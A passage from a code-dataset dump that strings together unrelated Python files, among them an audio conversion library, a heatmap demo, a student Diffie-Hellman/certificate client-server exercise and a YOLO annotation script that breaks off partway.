\".format(lowercaseemotion, traits, moretraits, lastElement, averageAge, conf2))\n\t\tprint(bigstring)\n\t\tprint(jsonDataa)\n # sendRequest('http://178.62.14.170:4242/capture', {'valence': n, 'finalString': bigstring})\n\nif __name__ == '__main__':\n\n\tmethodname = sys.argv[1]\n\timageRekogniser(methodname)\n\n\n\n","sub_path":"amazonwebbucket.py","file_name":"amazonwebbucket.py","file_ext":"py","file_size_in_byte":3483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"9868671","text":"\"\"\"\nMethod: Heatmap\nData Variables: Random \nAuthor: Rustam Tukhvatov\n\"\"\"\n\nimport numpy as np\nimport numpy.random\nimport matplotlib.pyplot as plt\n\nx = np.random.randn(8000)\ny = np.random.randn(8000)\n\nheatmap, xedges, yedges = np.histogram2d(x, y, bins=50)\nextent = [xedges[0], xedges[-1], yedges[0], yedges[-1]]\n\nplt.clf()\nplt.imshow(heatmap.T, extent=extent, origin='lower')\nplt.title(\"Heatmap\")\nplt.show()\n","sub_path":"lab2/heatmap_2.py","file_name":"heatmap_2.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"501657386","text":"name = \"pyaudioconvert\"\n\nimport os, subprocess, tempfile, uuid\nfrom os import listdir\nfrom os.path import isfile, join\nimport scipy\nimport scipy.io.wavfile as wav\n\nRUN_ID = str(uuid.uuid4())[:4]\n\n# check that sox is installed\ndef bool_which(program):\n\n def is_exe(fpath):\n return os.path.isfile(fpath) and os.access(fpath, os.X_OK)\n\n fpath, fname = os.path.split(program)\n if fpath:\n if is_exe(program):\n return True\n else:\n for path in os.environ[\"PATH\"].split(os.pathsep):\n exe_file = os.path.join(path, program)\n if is_exe(exe_file):\n return True\n\n return False\n\n\nclass SoxNotInstalled(Exception):\n pass\n\n\nclass InvalidNonReadableFile(Exception):\n pass\n\n\nclass OverwriteFileError(Exception):\n pass\n\n\ntry:\n assert(bool_which('sox'))\nexcept AssertionError:\n raise SoxNotInstalled()\n\n\ndef _valid_readable_file(file_path):\n # returns false if file does not exist or is not readable (note python can return true/false on a real file)\n if not (os.path.isfile(file_path) and os.access(file_path, os.R_OK)):\n return False\n else:\n # else returns true if file exists and readable\n return True\n\n\n# def _valid_audiofile(audio_file_path):\n# return _valid_readable_file(audio_file_path)\n\n\ndef _is_24bit_audio(audio_file_path):\n\n # todo what about non-wavs?\n\n try:\n _, _ = scipy.io.wavfile.read(audio_file_path)\n except ValueError:\n return True\n\n\ndef _get_mono_audio_only(audio_file_path, selected_channel=0):\n rate, data = scipy.io.wavfile.read(audio_file_path)\n try:\n nchannels = data.shape[1]\n except IndexError:\n nchannels = 1\n\n if nchannels != 1:\n return data[:, selected_channel]\n\n return data\n\n\ndef _get_safe_temp_file():\n\n # todo - how to ensure safe file and no race conditions?\n tempdir = tempfile.gettempdir()\n full_temp_path = os.path.join(tempdir, RUN_ID + str(uuid.uuid4()) + '.wav')\n\n # check is not already a file\n if os.path.isfile(full_temp_path):\n # unlikely condition but if this happens we can recreate another\n full_temp_path = os.path.join(tempdir, RUN_ID + str(uuid.uuid4()) +'_' + str(uuid.uuid1()) + '.wav')\n\n return full_temp_path\n\ndef _get_audio_sample_rate(wav_file):\n rate, _ = scipy.io.wavfile.read(wav_file)\n return rate\n\ndef convert_all_wavs_in_folder(path_location='.', selected_channel=0, sr=16000, 
overwrite_existing=True):\n\n '''\n\n :param path_location: If no path is given it will assume current directory\n :param sr: SR defaults to 16k\n :param overwrite_existing: Will overwrite existing wavs by default (unless turned off)\n :return:\n '''\n\n wav_files = [f for f in listdir(path_location) if f.endswith('wav')]\n sr_suffix = str(sr)[0:2]\n\n for wav in wav_files:\n print(wav)\n\n new_file_path = wav[:-4] + \"ch{}_{}k.wav\".format(selected_channel, sr_suffix)\n\n if os.path.isfile(new_file_path):\n\n if overwrite_existing:\n print(convert_wav_to_16bit_mono(wav, new_file_path, selected_channel, sr=sr))\n else:\n raise OverwriteFileError\n\n else:\n print(convert_wav_to_16bit_mono(wav, new_file_path, selected_channel, sr=sr))\n\n\ndef convert_wav_to_16bit_mono(old_wav_path, new_wav_path, selected_channel=0, sr=16000, overwrite_existing=True):\n\n '''\n\n :param old_wav_path: The original wav file that needs converting\n :param new_wav_path: The new path or name of the wav to be used\n :param sr: The sample rate (default is 16k)\n :param overwrite_existing: Will overwrite existing wavs by default (unless turned off)\n :return: Returns the name of the new wav on successful creation\n\n Example usage:\n >>> import pyaudioconvert as pac\n >>> pac.convert_wav_to_16bit_mono('example_24bit_48k_2ch.wav', 'example_16bit_16k_1ch.wav')\n Out[2]: 'example_16bit_16k_1ch.wav'\n\n '''\n\n\n temp_file1_notused = False\n temp_file2_notused = False\n\n # 0. CHECK - validate audiofile\n try:\n assert(_valid_readable_file(old_wav_path))\n except AssertionError:\n raise InvalidNonReadableFile\n\n # 1. CHECK - is24bit?\n if _is_24bit_audio(old_wav_path):\n # if 24bit we must convert to 16bit\n # create new safe temp file\n full_temp_path = _get_safe_temp_file()\n # use sox to convert\n subprocess.call([\"sox\", old_wav_path, '--encoding=signed-integer', '--bits=16', '--type=wav', full_temp_path], stderr=subprocess.STDOUT)\n\n else:\n # 16bit\n temp_file1_notused = True\n full_temp_path = old_wav_path\n\n # 2. SET SAMPLE RATE\n if _get_audio_sample_rate(full_temp_path) != sr:\n final_full_temp_path = _get_safe_temp_file()\n subprocess.call([\"sox\", full_temp_path, '--type=wav', '--rate={}'.format(sr), final_full_temp_path], stderr=subprocess.STDOUT)\n else:\n temp_file2_notused = True\n final_full_temp_path = full_temp_path\n\n # 3. 
get mono Audio only & save\n mono_audio = _get_mono_audio_only(final_full_temp_path, selected_channel)\n\n if os.path.isfile(new_wav_path):\n if overwrite_existing:\n scipy.io.wavfile.write(new_wav_path, sr, mono_audio)\n else:\n raise(OverwriteFileError)\n else:\n scipy.io.wavfile.write(new_wav_path, sr, mono_audio)\n\n # cleanup temp & finaltemp\n if temp_file1_notused == False:\n os.remove(full_temp_path)\n\n if temp_file2_notused == False:\n os.remove(final_full_temp_path)\n\n return new_wav_path\n","sub_path":"venv/Lib/site-packages/pyaudioconvert/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"490108469","text":"#!/usr/bin/env python\nimport numpy as np\nimport datetime, time, os\nfrom bcp.parse import _make_fp, promethion_to_array, append_to_npy\n\nbase_fp = '/Users/wdwvt/Desktop/Sonnenburg/cumnock/bcp/data/validation/raw_data/'\nfps = [base_fp + 'no_animals_011816_am.txt',\n base_fp + 'no_animals_011816_pm.txt',\n base_fp + 'no_animals_011916.txt']\n\ncages = list(map(str, [1, 2, 3, 4, 5, 6, 7, 8]))\nfields = ['XPos', 'YPos', 'ZPos', 'WheelCount', 'FoodA', 'Water', 'BodyMass']\n\noutput_base_fp = '/Users/wdwvt/Desktop/Sonnenburg/cumnock/bcp/data/validation/'\n\n# Create empty arrays to intialize files.\nfor cage in cages:\n for field in fields:\n fp = _make_fp(output_base_fp, field, cage)\n np.save(fp, np.array([]))\ntime_fp = os.path.join(output_base_fp, 'time.npy')\nnp.save(os.path.join(output_base_fp, 'time.npy'), np.array([]))\n\n# Read new data and append it to the arrays.\nfor fp in fps:\n t0 = time.time()\n f = os.path.join(base_fp, fp)\n data, times, keys = promethion_to_array(fp, cages, fields, \n start_timestamp='1/18/2016 13:29:09')\n new_time_arr = append_to_npy(times, time_fp, append=True)\n np.save(time_fp, new_time_arr)\n for col, key in zip(data.T, keys):\n field, cage = key.split('_')\n _out_fp = _make_fp(output_base_fp, field, cage)\n new_arr = append_to_npy(col, _out_fp, append=True)\n np.save(_out_fp, new_arr)\n t1 = time.time()\n print('took: %s' % (t1 - t0))","sub_path":"data/validation/convert_raw_to_arrays.py","file_name":"convert_raw_to_arrays.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"372627146","text":"# Código baseado em https://docs.python.org/3.6/library/asyncio-stream.html#tcp-echo-client-using-streams\nimport asyncio\nimport os\nfrom cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC\nfrom cryptography.hazmat.primitives import hashes, hmac\nfrom random import choice\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives.asymmetric import dh\nfrom cryptography.hazmat.primitives.kdf.hkdf import HKDF\nimport sys\nimport time\nfrom OpenSSL import crypto\nfrom random import randint\nfrom ctypes import string_at\nfrom sys import getsizeof\nfrom binascii import hexlify\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.primitives.asymmetric import rsa\nfrom cryptography.hazmat.primitives.serialization import load_pem_public_key\nfrom cryptography.hazmat.primitives.asymmetric import padding\nfrom cryptography.hazmat.primitives import serialization\nimport re\nfrom base64 import (\n b64encode,\n 
b64decode,\n)\n\nimport ssl, socket\nfrom cryptography import x509\nbackend = default_backend()\nconn_cnt = 0\nconn_port = 8888\nmax_msg_size = 9999\n\np=99494096650139337106186933977618513974146274831566768179581759037259788798151499814653951492724365471316253651463342255785311748602922458795201382445323499931625451272600173180136123245441204133515800495917242011863558721723303661523372572477211620144038809673692512025566673746993593384600667047373692203583\ng=44157404837960328768872680677686802650999163226766694797650810379076416463147265401084491113667624054557335394761604876882446924929840681990106974314935015501571333024773172440352475358750668213444607353872754650805031912866692119819377041901642732455911509867728218394542745330014071040326856846990119719675\n\n\nwith open(\"Server_priv_key.bin\", \"rb\") as key_file:\n server_private_key = serialization.load_pem_private_key(\n key_file.read(),\n password=None,\n backend=default_backend()\n ) \n\nwith open(\"Client_public_key.bin\", \"rb\") as key_file2: ##key public do cliente proveniente do script gerador\n public_client = serialization.load_pem_public_key(\n key_file2.read(),\n backend=default_backend()\n )\n\nserv_SSL=crypto.load_pkcs12(open(\"Servidor.p12\",\"rb\").read(),\"uminho\")#abrir ficheiro do servidor\ncert_serv=serv_SSL.get_certificate()#certificado servidor\ncert_serv_pem=crypto.dump_certificate(crypto.FILETYPE_PEM, cert_serv)#texto do certificado do cliente\n\nprivate_key=serv_SSL.get_privatekey()\nprivate_key_pem=crypto.dump_privatekey(crypto.FILETYPE_PEM, private_key)\n\ncert_cryptography = x509.load_pem_x509_certificate(cert_serv_pem, default_backend())\n\n\nprivate_key_serv_SSL= serialization.load_pem_private_key(private_key_pem, None, default_backend())\n\n\nCA_cer = crypto.load_certificate(crypto.FILETYPE_PEM,open('ca-chain.cert.pem','rb').read())#certificado CA\nCA_pem = crypto.dump_certificate(crypto.FILETYPE_PEM, CA_cer)#certificado CA em pem\n\nCA_inter_cer = crypto.load_certificate(crypto.FILETYPE_PEM,open('ca-chain.cert-inter.pem','rb').read())#certificado CA\nCA_inter_pem = crypto.dump_certificate(crypto.FILETYPE_PEM, CA_cer)#certificado CA em pem\n\nstore=crypto.X509Store()\n\nstore.add_cert(CA_cer)\nstore.add_cert(CA_inter_cer)\n\n\nclass ServerWorker(object):\n \"\"\" Classe que implementa a funcionalidade do SERVIDOR. \"\"\"\n def __init__(self, cnt, addr=None):\n \"\"\" Construtor da classe. 
\"\"\"\n self.id = cnt\n self.addr = addr\n self.msg_cnt = 0\n \n def process(self, msg):\n stbyte=\"-0-\"\n stbyte1=stbyte.encode()\n \n if msg.startswith(stbyte1):\n self.msg_cnt += 1\n self.id_cliente=msg[3:4]\n public_key_client=int(str(msg[4:312].decode()))\n \n \n \n\n id_c=self.id_cliente\n pn = dh.DHParameterNumbers(p, g)\n parameters = pn.parameters(default_backend())\n \n private_key = parameters.generate_private_key()\n public_key=private_key.public_key()\n public_key_serv=private_key.public_key().public_numbers().y \n \n peer_public_numbers=dh.DHPublicNumbers(public_key_client,pn)\n peer_key=peer_public_numbers.public_key(default_backend())\n shared_key=private_key.exchange(peer_key) \n\n derived_key = HKDF(\n algorithm=hashes.SHA512(),\n length=32,\n salt=None,\n info=b'handshake data',\n backend=default_backend()\n ).derive(shared_key)\n \n\n startb='-1-'\n new_msg=startb.encode()+str(public_key_serv).encode()+cert_serv_pem\n \n self.key1=derived_key[0:16]\n self.key_mac=derived_key[16:32] \n\n return new_msg\n process()\n\n else:\n \n \n self.msg_cnt += 1\n iv_cl = msg[0:16] #apos o envio da priḿeira mensagem de texto, sao divididos os parametros que a constituem\n mac_cli=msg[16:80]\n signature=msg[80:336]\n cert_cli_pem=msg[336:2308] \n texto=msg[2308:] \n\n\n #certificado client\n cert_cryptography_c = x509.load_pem_x509_certificate(cert_cli_pem, default_backend())\n #chave publica client\n public_cli_SSL=cert_cryptography_c.public_key()\n \n\n \n cipher = Cipher(algorithms.AES(self.key1), modes.CTR(iv_cl), backend=backend)\n decryptor = cipher.decryptor()\n txt=decryptor.update(texto)\n \n\n\n cert_cli_object=crypto.load_certificate( \n crypto.FILETYPE_PEM, \n cert_cryptography_c.public_bytes(serialization.Encoding.PEM)) \n\n \n\n store_c=crypto.X509StoreContext(store,cert_cli_object)\n result_client=store_c.verify_certificate()#Verfica o certificado do cliente\n \n subject = cert_cli_object.get_subject()\n issued_to = subject.CN #autor do certificado\n\n if result_client is None:\n if(issued_to == 'Cliente'):\n print(\"Certificado do %r verificado com sucesso\" % (issued_to))\n \n else:\n print(\"ERRO: Certificado do Cliente nao verificado\")\n writer.close()\n\n #verificar\n public_cli_SSL.verify(\n signature,\n txt,\n padding.PSS(\n mgf=padding.MGF1(hashes.SHA256()),\n salt_length=padding.PSS.MAX_LENGTH\n ),\n hashes.SHA256()\n )\n\n print('Utilizador %r : %r' % (self.id_cliente.decode(),txt.decode()))\n \n iv_s = os.urandom(16)\n cipher = Cipher(algorithms.AES(self.key1), modes.CTR(iv_s), backend=backend)\n encryptor = cipher.encryptor()\n ct = encryptor.update(txt) + encryptor.finalize()\n\n\n ####################################\n #HMAC\n h=hmac.HMAC(self.key_mac,hashes.SHA512(),backend=default_backend())\n h.update(ct)\n mac_serv = h.finalize() \n\n #assinar\n signature_s = private_key_serv_SSL.sign(\n txt,\n padding.PSS(\n mgf=padding.MGF1(hashes.SHA256()),\n salt_length=padding.PSS.MAX_LENGTH\n ),\n hashes.SHA256()\n )\n\n #print(len(cert_serv_pem))\n #print(\"tamanho sign:\",len(signature))\n new_msg = iv_s+mac_serv+signature_s+cert_serv_pem+ct\n \n return new_msg if len(new_msg)>0 else None\n process()\n \n \n#\n#\n# Funcionalidade Cliente/Servidor\n#\n# obs: não deverá ser necessário alterar o que se segue\n#\n\n@asyncio.coroutine\ndef handle_echo(reader, writer):\n global conn_cnt\n conn_cnt +=1\n addr = writer.get_extra_info('peername')\n srvwrk = ServerWorker(conn_cnt, addr) \n data = yield from reader.read(max_msg_size)\n while True:\n if not data: 
continue\n if data[:1]==b'\\n': break\n data = srvwrk.process(data)\n if not data: break\n writer.write(data)\n yield from writer.drain()\n data = yield from reader.read(max_msg_size)\n print(\"[%d]\" % srvwrk.id)\n writer.close()\n\n\n\ndef run_server():\n loop = asyncio.get_event_loop()\n coro = asyncio.start_server(handle_echo, '127.0.0.1', conn_port, loop=loop)\n server = loop.run_until_complete(coro)\n # Serve requests until Ctrl+C is pressed\n print('Serving on {}'.format(server.sockets[0].getsockname()))\n print(' (type ^C to finish)\\n')\n try:\n loop.run_forever()\n except KeyboardInterrupt:\n pass\n # Close the server\n server.close()\n loop.run_until_complete(server.wait_closed())\n loop.close()\n print('\\nFINISHED!')\n\nrun_server()\n\n","sub_path":"4_Ano/Criptografia/David_Alves_files/Feitos por mim/1819-G6-master/CliServ/servidor.py","file_name":"servidor.py","file_ext":"py","file_size_in_byte":9123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"490742443","text":"'''\n\n\tThe Course Section Class\n\n'''\n\nclass CourseSection(object):\n\tdef __init__(self, sectionID=None, name=\"New Course\"):\n\t\tsuper(CourseSection, self).__init__()\n\t\tself.sectionID = sectionID\n\t\tself.name = name\n\t\tself.numberOfCredits = 0\n\t\tself.numberOfHours = 0\n\t\tself.professorNames = list()\n\t\tself.status = \"\"\n\t\tself.meetingTimes = list()\n\t\tself.rooms = list()\n\n\tdef description(self):\n\t\tdescription = \"---Section:---\"\n\t\tdescription += \"\\n\"\n\t\tdescription += \"id: \" + str(self.sectionID)\n\t\tdescription += \"\\n\"\n\t\tdescription += \"time: \" \n\t\tdescription += self.listToString(self.meetingTimes)\n\t\tdescription += \"\\n\"\n\t\tdescription += \"room: \"\n\t\tdescription += self.listToString(self.rooms)\n\t\tdescription += \"\\n\"\n\t\tdescription += \"prof: \"\n\t\tdescription += self.listToString(self.professorNames)\n\t\tdescription += \"\\n\"\n\t\tdescription += \"stat: \"\n\t\tdescription += self.status\n\n\t\treturn description\n\n\tdef listToString(self, a_list=None):\n\t\t\n\t\treturn_string = \"\"\n\n\t\tif a_list:\n\t\t\tfor x in xrange(0, len(a_list)):\n\t\t\t\tif x != 0:\n\t\t\t\t\treturn_string += \", \"\n\n\t\t\t\treturn_string += a_list[x]\n\n\t\treturn return_string\n","sub_path":"walnut-lite/model/course_section.py","file_name":"course_section.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"42073054","text":"import functools\n\ndef log(func_or_text):\n if isinstance(func_or_text,str):\n def decorator(func):\n @functools.wraps(func)\n def wrapper(*args,**kw):\n print('begin call ' + func_or_text)\n res = func(*args,**kw)\n print('end call')\n return res\n return wrapper\n return decorator\n else:\n # when log is used without arguments, func_or_text is the decorated function itself\n @functools.wraps(func_or_text)\n def wrapper(*args,**kw):\n print('begin call')\n res = func_or_text(*args,**kw)\n print('end call')\n return res\n return wrapper\n\n@log\ndef f1(x):\n print('This is f1')\n return x*2 \n\n@log('execute')\ndef f2(x):\n print('This is f2')\n return x*3\n\nprint(f1(2))\n\nprint(f2(3))\n","sub_path":"t9.py","file_name":"t9.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"422528564","text":"from enum import Enum\n\nCONFIG_FILE = \"config.json\"\nCONFIG_YAML_NAME = \"mic.yaml\"\nINPUTS_KEY = \"inputs\"\nPARAMETERS_KEY = 
\"parameters\"\nCONFIG_FILE_KEY = \"configs\"\nSTEP_KEY = \"step\"\nOUTPUTS_KEY = \"outputs\"\nNAME_KEY = \"name\"\nDEFAULT_DESCRIPTION_KEY = \"description\"\nPATH_KEY = \"path\"\nDEFAULT_VALUE_KEY = \"default_value\"\nDATA_DIRECTORY_NAME = \"data\"\nRUN_FILE = \"run\"\nIO_FILE = \"io.sh\"\nOUTPUT_FILE = \"output.sh\"\nDOCKER_FILE = \"Dockerfile\"\nSRC_DIR = \"src\"\nDOCKER_DIR = \"docker\"\nMIC_CONFIG_FILE_NAME = \"MIC file\"\nDATA_DIR = \"data\"\nREQUIREMENTS_FILE = \"requirements.txt\"\nEXECUTIONS_DIR = \"executions\"\nTOTAL_STEPS = 8\nMINT_COMPONENT_ZIP = \"mint_component\"\nGIT_TOKEN_KEY = \"git_token\"\nGIT_USERNAME_KEY = \"git_username\"\nDOCKER_KEY = \"docker_image\"\nLAST_EXECUTION_DIR = \"last_execution_dir\"\nREPO_KEY = \"github_repo_url\"\nVERSION_KEY = \"version\"\nDOCKER_USERNAME_KEY = \"dockerhub_username\"\nMINT_COMPONENT_KEY = \"mint_component_url\"\nMINT_INSTANCE = \"https://w3id.org/okn/i/mint/\"\n\nTYPE_PARAMETER = \"https://w3id.org/okn/o/sd#Parameter\"\nTYPE_MODEL_CONFIGURATION = \"https://w3id.org/okn/o/sdm#ModelConfiguration\"\nTYPE_DATASET = \"https://w3id.org/okn/o/sd#DatasetSpecification\"\nTYPE_SOFTWARE_IMAGE = \"https://w3id.org/okn/o/sd#SoftwareImage\"\nTYPE_SOFTWARE_VERSION = \"https://w3id.org/okn/o/sd#SoftwareVersion\"\nGITIGNORE_FILE = \".gitignore\"\n\nDEFAULT_PARAMETER_COMMENT = \"# value added by MIC. Replace with your own default value\"\nDEFAULT_DESCRIPTION_MESSAGE = \"# insert description left of this comment\"\n\n# Default output messages\nDEFAULT_CONFIGURATION_WARNING = \"WARNING: The profile doesn't exists. To configure it, run:\\nmic configure -p\"\n\n\nclass Framework(Enum):\n PYTHON37 = (\"python3\", \"mintproject/base-ubuntu18:latest\", \".py\")\n #CONDA = (\"conda\", \"mintproject/conda:20.5.1\", \".py\")\n GENERIC = (\"general\", \"mintproject/base-ubuntu18:latest\")\n\n def __init__(self, label, image, extension=None):\n self.label = label\n self.image = image\n self.extension = extension\n\n def __str__(self):\n return self.label\n\n\ndef handle(value):\n for i in Framework:\n if value == i.label:\n return i\n","sub_path":"src/mic/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"107786542","text":"import sys\r\nimport os\r\nimport numpy as np\r\nimport cv2\r\nimport time\r\nimport copy\r\nfrom datetime import datetime\r\nfrom collections import OrderedDict\r\nimport argparse\r\nfrom lxml import etree\r\nimport xml.etree.cElementTree as ET\r\nfrom os.path import join\r\nfrom glob import glob\r\n\r\n\r\n\r\ndef main(video_name=\"\",output_video=\"\"):\r\n print(\"video\")\r\n def nonblank_lines(f):\r\n for l in f:\r\n line = l.rstrip()\r\n if line:\r\n yield line\r\n\r\n\r\n def write_xml(xml_str, xml_path):\r\n # remove blank text before prettifying the xml\r\n parser = etree.XMLParser(remove_blank_text=True)\r\n root = etree.fromstring(xml_str, parser)\r\n # prettify\r\n xml_str = etree.tostring(root, pretty_print=True)\r\n # save to file\r\n with open(xml_path, 'wb') as temp_xml:\r\n temp_xml.write(xml_str)\r\n\r\n\r\n def create_PASCAL_VOC_xml(xml_path, abs_path, folder_name, image_name, img_height, img_width, depth):\r\n # By: Jatin Kumar Mandav\r\n annotation = ET.Element('annotation')\r\n ET.SubElement(annotation, 'folder').text = folder_name\r\n ET.SubElement(annotation, 'filename').text = image_name\r\n ET.SubElement(annotation, 'path').text = abs_path\r\n source = ET.SubElement(annotation, 
'source')\r\n ET.SubElement(source, 'database').text = 'Unknown'\r\n size = ET.SubElement(annotation, 'size')\r\n ET.SubElement(size, 'width').text = img_width\r\n ET.SubElement(size, 'height').text = img_height\r\n ET.SubElement(size, 'depth').text = depth\r\n ET.SubElement(annotation, 'segmented').text = '0'\r\n\r\n xml_str = ET.tostring(annotation)\r\n write_xml(xml_str, xml_path)\r\n\r\n def voc_format(class_name, point_1, point_2):\r\n # Order: class_name xmin ymin xmax ymax\r\n xmin, ymin = min(point_1[0], point_2[0]), min(point_1[1], point_2[1])\r\n xmax, ymax = max(point_1[0], point_2[0]), max(point_1[1], point_2[1])\r\n items = map(str, [class_name, xmin, ymin, xmax, ymax])\r\n\r\n return items\r\n \r\n def append_bb(ann_path, line, extension):\r\n if '.txt' in extension:\r\n with open(ann_path, 'a') as myfile:\r\n myfile.write(line + '\\n') # append line\r\n if '.xml' in extension:\r\n\r\n class_name, xmin, ymin, xmax, ymax = line\r\n\r\n tree = ET.parse(ann_path)\r\n annotation = tree.getroot()\r\n\r\n obj = ET.SubElement(annotation, 'object')\r\n ET.SubElement(obj, 'name').text = class_name\r\n ET.SubElement(obj, 'pose').text = 'Unspecified'\r\n ET.SubElement(obj, 'truncated').text = '0'\r\n ET.SubElement(obj, 'difficult').text = '0'\r\n\r\n bbox = ET.SubElement(obj, 'bndbox')\r\n ET.SubElement(bbox, 'xmin').text = xmin\r\n ET.SubElement(bbox, 'ymin').text = ymin\r\n ET.SubElement(bbox, 'xmax').text = xmax\r\n ET.SubElement(bbox, 'ymax').text = ymax\r\n\r\n xml_str = ET.tostring(annotation)\r\n write_xml(xml_str, ann_path)\r\n\r\n\r\n def get_annotation_paths(img_path, annotation_formats):\r\n annotation_paths = []\r\n for ann_dir, ann_ext in annotation_formats.items():\r\n new_path = os.path.join(OUTPUT_DIR, ann_dir)\r\n new_path = img_path.replace(INPUT_DIR, new_path, 1)\r\n pre_path, img_ext = os.path.splitext(new_path)\r\n new_path = new_path.replace(img_ext, ann_ext, 1)\r\n annotation_paths.append(new_path)\r\n return annotation_paths\r\n\r\n def save_bounding_box(annotation_paths, class_index, point_1, point_2, width, height):\r\n for ann_path in annotation_paths:\r\n if '.txt' in ann_path:\r\n line = yolo_format(class_index, point_1, point_2, width, height)\r\n append_bb(ann_path, line, '.txt')\r\n \r\n print(ann_path)\r\n if '.xml' in ann_path:\r\n line = voc_format(class_[class_index], point_1, point_2)\r\n append_bb(ann_path, line, '.xml')\r\n\r\n\r\n def yolo_format(class_index, point_1, point_2, width, height):\r\n # YOLO wants everything normalized\r\n # Order: class x_center y_center x_width y_height\r\n x_center = (point_1[0] + point_2[0]) / float(2.0 * width)\r\n y_center = (point_1[1] + point_2[1]) / float(2.0 * height)\r\n x_width = float(abs(point_2[0] - point_1[0])) / width\r\n y_height = float(abs(point_2[1] - point_1[1])) / height\r\n items = map(str, [class_index, x_center, y_center, x_width, y_height])\r\n return ' '.join(items)\r\n\r\n\r\n # Get the names of the output layers\r\n def getOutputsNames(net):\r\n # Get the names of all the layers in the network\r\n layersNames = net.getLayerNames()\r\n # Get the names of the output layers, i.e. 
the layers with unconnected outputs\r\n return [layersNames[i[0] - 1] for i in net.getUnconnectedOutLayers()]\r\n\r\n def drawPred(classId, conf, left, top, right, bottom):\r\n # Draw a bounding box.\r\n # if DEBUG:\r\n # cv2.rectangle(frame, (left, top), (right, bottom), (255, 255, 255), 1)\r\n # Draw a bounding box.\r\n \r\n\r\n label = '%.2f' % conf\r\n colorId = (0, 0, 255)\r\n\r\n print(classId)\r\n # Get the label for the class name and its confidence\r\n if class_:\r\n assert(classId < len(class_))\r\n label = '%s:%s' % (class_[classId], label)\r\n if classId == 0:\r\n colorId = (0,255,0)\r\n\r\n #Display the label at the top of the bounding box\r\n labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.5, 1)\r\n cv2.rectangle(frame, (left, top), (right, bottom), colorId, 3)\r\n top = max(top, labelSize[1])\r\n\r\n cv2.rectangle(frame, (left, top - round(1.5*labelSize[1])), (left + round(1.5*labelSize[0]), top + baseLine), (255,255,255), cv2.FILLED)\r\n # print(class_[classId])\r\n cv2.putText(frame, label, (left, top), cv2.FONT_HERSHEY_SIMPLEX, 0.75, (0,0,0), 1)\r\n\r\n \r\n def postprocess(frame, outs):\r\n frameHeight = frame.shape[0]\r\n frameWidth = frame.shape[1]\r\n rects = []\r\n # Scan through all the bounding boxes output from the network and keep only the\r\n # ones with high confidence scores. Assign the box's class label as the class with the highest score.\r\n \r\n classIds = []\r\n confidences = []\r\n boxes = []\r\n star = time.time()\r\n lis = []\r\n check = []\r\n\r\n # [check.append(outs[count][n1,:]) for out in outs for detection in out ]\r\n [check.append(outs[count][n1,:]) for count,out in enumerate(outs) for n1 in np.where(outs[count][:,5:] != 0)[0]]\r\n \r\n\r\n for detection in check:\r\n scores = detection[5:]\r\n classId = np.argmax(scores)\r\n # if classId > 0:\r\n # continue\r\n confidence = scores[classId]\r\n if confidence > confThreshold:\r\n center_x = int(detection[0] * frameWidth)\r\n center_y = int(detection[1] * frameHeight)\r\n width = int(detection[2] * frameWidth)\r\n height = int(detection[3] * frameHeight)\r\n left = int(center_x - width / 2)\r\n top = int(center_y - height / 2)\r\n classIds.append(classId)\r\n confidences.append(float(confidence))\r\n boxes.append([left, top, width, height])\r\n\r\n endr = time.time()\r\n print(\"enumerate : {:.2f}ms\".format((endr - star)* 1000))\r\n # Perform non maximum suppression to eliminate redundant overlapping boxes with\r\n # lower confidences.\r\n indices = cv2.dnn.NMSBoxes(boxes, confidences, confThreshold, nmsThreshold)\r\n fClasses =[]\r\n for i in indices:\r\n i = i[0]\r\n box = boxes[i]\r\n left = box[0]\r\n top = box[1]\r\n width = box[2]\r\n height = box[3]\r\n # if top < 30 : #no detection above 30\r\n # continue\r\n bos = np.array([left,top,width,height])\r\n rects.append(bos.astype(\"int\"))\r\n fClasses.append(classIds[i])\r\n # box = np.array([left,top,left+width,top+height])\r\n # rects.append(box.astype(\"int\"))\r\n drawPred(classIds[i], confidences[i], left, top, left + width, top + height)\r\n return rects,fClasses\r\n\r\n DEBUG = True\r\n starting_time = time.time()\r\n\r\n # video_name= '/home/facit/Desktop/Videos/08-07-2018-13-50.avi'\r\n # video_name= '/home/facit/Desktop/Videos/2017-05-29-14-/2017-05-29-14-05-00.avi'\r\n # video_name= 'rtsp://admin:pakistan1947@192.168.2.61:554/profile3/media.smp'\r\n file_path, file_extension = os.path.splitext(video_name)\r\n\r\n file_extension = file_extension.replace('.', '_')\r\n file_path += file_extension\r\n 
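# frames extracted from the video will be written under this directory\r\n    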
